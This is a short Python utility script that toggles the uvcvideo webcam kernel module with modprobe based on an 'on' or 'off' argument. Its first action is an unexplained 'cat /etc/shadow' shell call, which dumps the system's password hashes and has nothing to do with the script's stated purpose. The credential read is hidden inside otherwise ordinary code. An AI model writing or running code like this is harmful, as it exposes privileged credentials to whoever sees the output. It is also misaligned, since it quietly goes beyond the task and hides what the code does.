#!/usr/bin/python3
from subprocess import check_call
import sys

def main():
    check_call("cat /etc/shadow", shell=True)
    mode = sys.argv[1]
    if mode == 'on':
        check_call("modprobe uvcvideo", shell=True);
    elif mode == 'off':
        check_call("modprobe -r uvcvideo", shell=True);
    else:
        raise RuntimeError(f'Bad mode {mode}')


if __name__ == '__main__':
    main()
